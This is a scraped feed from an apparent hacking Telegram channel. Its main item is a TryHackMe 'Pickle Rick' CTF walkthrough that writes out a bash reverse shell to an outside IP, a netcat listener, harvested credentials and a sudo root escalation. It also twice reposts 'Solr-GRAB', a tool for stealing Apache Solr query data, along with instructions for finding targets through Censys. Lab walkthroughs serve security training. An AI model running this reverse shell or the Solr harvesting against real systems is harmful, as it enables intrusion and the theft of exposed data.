Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Pickle Rick TryHackMe Walkthrough

Today it is time to solve another challenge called “Pickle Rick”. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making this machine goes to tryhackme. The breakdown of the Machine with the redacted flags is as follow: Level: Easy· Network Scanningo Nmap ScanEnumerationo Enumerating HTTP ServiceExploitationo Exploiting Command ModulePrivilege Escalationo Enumerating Sudo PermissionsWalkthroughAfter Booting up the target machine from the TryHackMe: Pickle Rick CTF Page, an IP will be assigned to the machine and will be visible on that page as well.IP Address: 10.10.43.98Three questions are required to complete this machine. Network ScanningWe will start a Nmap scan with the -sC for Default Scripts and -sV for Scanning Versions.nmap -sC -sV 10.10.43.98https://1.bp.blogspot.com/-dya_scxmP-Q/YKzGkgVQcBI/AAAAAAAAwLg/QHUcY4rLqVQRAI1RESSkJ-k3fqqyFiPfACLcBGAsYHQ/s16000/1.png Nmap was able to identify 2 services running on the target machine. It included SSH (22), HTTP (80).EnumerationSince we don’t have credentials for the SSH service, we will begin the enumeration from the HTTP service. We see a simple Rick and Morty-themed webpage. It reads a message from Rick to Morty. It tells Morty that Rick has turned himself into a Pickle again. The twist is that he is unable to change back. He asks Morty to login into his computer and extract 3 secret ingredients that are required for Rick to get back to human from Pickle. Since Rick has forgotten the password for his computer, Morty is required to use his Hacking Skills to get those ingredients. http://10.10.43.98/https://1.bp.blogspot.com/-cAdSYwGIzS0/YKzHUfAij1I/AAAAAAAAwLo/Qa3_s5tBJ58tJiLrLFR15CL4q905Vtp1QCLcBGAsYHQ/s16000/2.png We try to look for any clues inside the webpage itself. We check the source code to find the username R1ckRul3s.view-source:http://10.10.43.98/https://1.bp.blogspot.com/-9lIhRaJDsiM/YKzHbVT4WsI/AAAAAAAAwLs/7lxxVpGGZCQxaftMy5btZ2gS3qh3sViiQCLcBGAsYHQ/s16000/3.png There are two possibilities here, either this is a username that can be used to log in via SSH or there is another login module inside the web application. To enumerate the second scenario, we ran a directory Bruteforce using dirb as shown in the image below. We found the robots.txt filedirb http://10.10.43.98. https://1.bp.blogspot.com/-Ubfb5vChmB0/YKzHhcod1TI/AAAAAAAAwLw/Rc-3w_LZsZ8hJy-BaLDbLCq4BENeUxN3ACLcBGAsYHQ/s16000/4.png Upon reading the robots.txt, we found Rick’s famous quote Wubbalubbadubdub. This may be the password for the user that we found earlier. Now we need to enumerate that login page if there is any. http://10.10.43.98/robots.txthttps://1.bp.blogspot.com/-cDH02QCqN-U/YKzHl6cpVuI/AAAAAAAAwL0/7hObyhRS[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Pickle Rick TryHackMe Walkthrough Today it is time to solve another challenge called “Pickle Rick”. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right…
jtMbh30qGa-ZxsmEou5nlIzdwCLcBGAsYHQ/s16000/5.png Back to our directory Bruteforce, this time we included the extension filter with the Bruteforce. We checked for the php files. After running for a while, it was able to extract a login.php. Maybe this is the portal that can be used to login into the web application<o:p dirb http://10.10.43.98 -X .php<o:phttps://1.bp.blogspot.com/-_5psAnvIhcc/YKzHrX1nxNI/AAAAAAAAwL8/GNUVs9grX2EObrzXoVPpBS7ExMV4uNR-wCLcBGAsYHQ/s16000/6.png Upon opening the login.php in the web browser, we see that it is the portal login. We use the username that we were able to enumerate from the source code of the home page and the password that we were able to enumerate from the robots.txt. <o:p http://10.10.43.98/login.php<o:pR1ckRul3s<o:pWubbalubbadubdub<o:phttps://1.bp.blogspot.com/-Nl3WaS9OO9g/YKzHvYcoKWI/AAAAAAAAwMA/kwwPJwEdPc4g5rVptRtagz0I1fxlneS4gCLcBGAsYHQ/s16000/7.png Exploitation<o:pWe were able to log in using the credentials. There were a bunch of other pages and options on the menu. However, the Commands tab attracted our attention. As expected, it was a panel that can be used to run system commands on the target machine. We ran the ls command to find a text file by the name of Sup3rS3cretPickl3Ingred.txt<o:p

<o:p https://1.bp.blogspot.com/-5iZQjevJY0k/YKzH0AP26UI/AAAAAAAAwMI/HzsWXMxTdAMkv8nyFdAtFifJhI7Q7zxSQCLcBGAsYHQ/s16000/8.png We tried reading the Sup3rS3cretPickl3Ingred.txt file using the cat command but we were intercepted by Mr. Meeseek he says that cat command is restricted. <o:p https://1.bp.blogspot.com/-xbhdIdFPU0Q/YKzH4BKG9uI/AAAAAAAAwMQ/8rkUp1EkAjIz6gyORt5y9vWAf75p6YFVACLcBGAsYHQ/s16000/9.png This is when we decided to pop open a reverse shell by executing a reverse shell script into the command section.<o:p bash -c 'bash -i >& /dev/tcp/10.10.210.158/8080 0>&1'<o:phttps://1.bp.blogspot.com/-uIlK0iA8-u8/YKzH9kSTQgI/AAAAAAAAwMY/5b4NfzzT-zYGQWoQPH-G8bPfWXIeBlY-gCLcBGAsYHQ/s16000/10.png We started a Netcat listener before executing the reverse shell script command on the web application. As soon as the execution went through, we had a reverse shell on the target machine as depicted below. Now there is no restricting that is stopping us from reading the Sup3rS3cretPickl3Ingred.txt file. We see that it contains one of the three Ingredients.<o:p nc -lvp 8080<o:pls<o:pcat Sup3rS3cretPickl3Ingred.txt<o:phttps://1.bp.blogspot.com/-rG5bbqB_XXU/YKzIBdWWAqI/AAAAAAAAwMg/L-_Bc06f7tQlfJCRA-kS7XkFAwEDiXJbwCLcBGAsYHQ/s16000/11.png The session that we have generated is for the user www-data. We enumerate the users on the machine to find the user rick. We traversed into the home directory of the rick user to find the Second ingredient. <o:p cd /home<o:pls<o:pcd rick<o:pls<o:pcat 'second ingredients'<o:phttps://1.bp.blogspot.com/-XrTFczj8wLw/YKzIGKwtA0I/AAAAAAAAwMo/2Urbe9YaWUoGNnI4X0zA_nPJXZCoxIZ1wCLcBGAsYHQ/s16000/12.png Privilege Escalation<o:pNow, we need to elevate the privileges on this machine to proceed. We check for the sudo permissions for the www-data user. We see that it can run all commands as root. We use the sudo command with bash to get the root shell. We were able to get the root shell on the machine. We then proceeded to read the Third Ingredient and conclude the machine. <o:p sudo -l<o:psudo bash<o:pwhoami<o:pcd /root<o:pcat 3rd.txt<o:phttps://1.bp.blogspot.com/-4Ae7W3cRLrI/YKzIMN32JCI/AAAAAAAAwMs/CEcyFUbPksoLrhnfOwyBxcBsuc7WkCR5QCLcBGAsYHQ/s16000/13.png
Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password

Steal Apache Solr instance Queries with or without a username and password. DISCLAIMER: This project should be used for authorized testing and educational purposes only.Download git clone https://github.com/GnosticPlayers/Solr-GRAB Usage You can search for Apache Solr Instances via Censys, with the dork "Welcome To Solr" or "Apache Solr Admin". To grab queries, simply go to the http access point, sometimes being on port 80, 443 or 8080. Replace "http://URLHERE/" with a desired URL, such as "http://127.0.0.1/". Replace "PROJECTHERE/" with a desired project entry, such as a directory "users/". Replace "IDHERE" with an ID that is unique per entry in JSON on the apache solr query, such as "id" or "global_id". Lastly, replace "AMOUNTOFROWSHERE" with the amount of rows found in the query, such as "74332". Now execute it with: bash index.sh. Sometimes, you'll have an error where it's a 404 not found. If that's the case, add "/solr/" between "http://URLHERE/" & "PROJECTHERE", such as: https://127.0.0.1/solr/users/. This should fix the problem. Author & Credits Written by GnosticPlayers & g9648 g9648 Email: g9648@riseup.net Gnostic Contacts Email: dreammarket@riseup.net Download Solr-GRAB
Read more...

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Bookstore TryHackMe Walkthrough

Today it is time to solve another challenge called “Bookstore”. It is available at TryHackMe for penetration testing practice. This challenge is of medium difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making this

The post Bookstore TryHackMe Walkthrough appeared first on Hacking Articles.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Pickle Rick TryHackMe Walkthrough

Today it is time to solve another challenge called “Pickle Rick”. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making

The post Pickle Rick TryHackMe Walkthrough appeared first on Hacking Articles.
SUBDOMAIN TAKEOVER FOR BUG BOUNTY

hey guys hackingcage is here, welcome to back again another post. A subdomain takeover is taken into account a high severity threat and…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password

https://1.bp.blogspot.com/-f4oyhWKFA1s/YKrvgLQ2UwI/AAAAAAAAWQo/9Kwg97He3o8Mk1oT4UGRoGvpLa53iHJQgCNcBGAsYHQ/w640-h322/Apache%2BSolr.png
Steal Apache Solr instance Queries with or without a username and password.

DISCLAIMER: This project should be used for authorized testing and educational purposes only.
Download

git clone https://github.com/GnosticPlayers/Solr-GRAB


Usage

You can search for Apache Solr Instances via Censys, with the dork "Welcome To Solr"or "Apache Solr Admin". To grab queries, simply go to the http access point, sometimes being on port 80, 443 or 8080.

* Replace "http://URLHERE/" with a desired URL, such as "http://127.0.0.1/".
* Replace "PROJECTHERE/" with a desired project entry, such as a directory "users/".
* Replace "IDHERE" with an ID that is unique per entry in JSON on the apache solr query, such as "id"or "global_id".
* Lastly, replace "AMOUNTOFROWSHERE" with the amount of rows found in the query, such as "74332".

Now execute it with: bash index.sh.

Sometimes, you'll have an error where it's a 404 not found. If that's the case, add "/solr/"between "http://URLHERE/"& "PROJECTHERE", such as: https://127.0.0.1/solr/users/. This should fix the problem.

Author & Credits

Written by GnosticPlayers & g9648

g9648

Email: g9648@riseup.net

Gnostic Contacts

Email: dreammarket@riseup.net
Download Solr-GRAB

___________________________
@hacking_Attack
@Hacking_Video
Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password
http://www.kitploit.com/2021/05/solr-grab-steal-apache-solr-instance.html